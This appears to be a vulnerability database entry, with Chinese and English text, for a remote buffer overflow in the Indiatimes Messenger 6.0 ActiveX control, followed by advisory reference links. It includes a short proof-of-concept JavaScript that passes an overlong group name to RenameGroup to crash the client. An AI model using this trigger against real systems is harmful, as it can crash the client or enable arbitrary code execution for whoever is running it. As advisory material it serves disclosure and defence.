https://www.exploit-db.com/exploits/26216
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-085

IndiatimesMessenger是由印度开发的即时通讯软件。IndiatimesMessenger6.0中的MMClient.exe存在缓冲区溢出漏洞，这会允许攻击者通过向MMClient.MunduMessenger.1ActiveX对象的RenameGroup函数提供长的组名参数导致拒绝服务并执行任意的代码。

source: http://www.securityfocus.com/bid/14705/info

Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability.

A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application.

Indiatimes Messenger 6.0 is affected by this issue. 

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]

来源:XF
名称:indiatimes-messenger-groupname-bo(22110)
链接:http://xforce.iss.net/xforce/xfdb/22110
来源:BID
名称:14705
链接:http://www.securityfocus.com/bid/14705
来源:SECTRACK
名称:1014842
链接:http://securitytracker.com/id?1014842
来源:SECUNIA
名称:16633
链接:http://secunia.com/advisories/16633/
来源:BUGTRAQ
名称:20050831IndiatimesMessenger6.0BufferOverflow(Remote)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112550635826169&w;=2